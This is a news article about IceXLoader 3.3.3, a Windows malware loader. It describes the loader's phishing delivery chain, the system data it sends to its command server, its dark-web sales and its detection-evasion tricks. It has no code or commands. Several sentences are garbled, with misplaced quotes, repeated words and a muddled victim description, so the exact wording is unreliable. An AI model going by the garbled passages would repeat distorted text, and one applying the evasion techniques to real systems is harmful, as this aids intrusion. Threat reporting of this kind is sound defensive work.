A malware loader that was considered a “work in progress” in June is now fully functional, infecting thousands of corporate and personal Windows PCs.
Version 3 of IceXLoader was discovered this summer by Fortinet’s FortiGuard Labs, which wrote that the malware’s functionality was incomplete and that it appeared to have been ported to the Nim programming language.
However, researchers from Minerva Labs reported on Tuesday that they detected a new iteration of IceXLoader – version 3.3.3 – with a multi-step delivery chain for the nasty code.
IceXLoader gathers system metadata – such as IP address, username and machine name, Windows version, and CPU, GPU and memory information – and sends it to a command and control (C2), according to the researchers.
They wrote that the malware’s SQLite database file, which is hosted on the C2 server and is continuously updated, “contained thousands of victim records, which contained” a mixture of private PCs and victim PCs. ‘company. We started notifying affected companies after the discovery,” he said.
IceXLoader was originally sold on the dark web for $118 per lifetime license by a group of developers who also sell other commodity malware and claim to have over 200 customers, FortiGuard wrote. It remains to be seen what the new version will be worth to criminals.
The malware initially enters systems via phishing campaigns. The emails contain a ZIP file which contains a dropper, which drops a .NET based downloader. This malware downloads another dropper which decrypts and injects IceXLoader in a new process.
IceXLoader contacts the C2 server for further commands and additional malware may be deployed to the compromised system. According to FortiGuard, version 1.0 of IceXLoader was used to distribute data exfiltration malware DCRat – or Dark Crystal RAT (Remote Access Trojan) while version 3.0 distributed cryptocurrency miner Monero .
IceXLoader has a number of features designed to evade detection, including code obfuscation, no execution in the Microsoft Defender Emulator, and PowerShell execution with an encrypted request to delay execution of the malware for 35 seconds to avoid sandboxes.
It’s part of a larger trend over the past few years of malware developers turning to newer languages like Go, DLang, Nim, and Rust to dodge easy detection.
“The [IceXLoader] The developers market their loader as FUD (Fully UnDetected), a term commonly used in malware hacking forums to refer to malware that can bypass antivirus products,” the FortiGuard researchers wrote. .”
The need to remain undetected likely convinced the malware developers to switch AutoID’s IceXLoader from pre-Nim releases to version 3 “since Nim is a relatively rare language for writing applications,” they wrote. they wrote. ®